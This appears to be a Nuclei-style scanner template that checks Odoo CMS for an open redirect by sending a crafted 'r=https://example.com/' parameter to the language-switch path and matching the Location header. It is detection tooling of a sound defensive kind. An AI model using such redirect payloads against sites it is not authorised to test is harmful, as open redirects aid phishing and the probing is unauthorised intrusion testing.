id: odoo-cms-redirect

info:
  name: Odoo CMS - Open redirection all Version
  author: 0x_Akoko
  description: Odoo CMS - Open redirection all Version.
  reference: https://cxsecurity.com/issue/WLB-2021020143
  severity: low
  tags: odoo,redirect

requests:
  - method: GET
    path:
      - "{{BaseURL}}/website/lang/en_US?r=https://example.com/"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
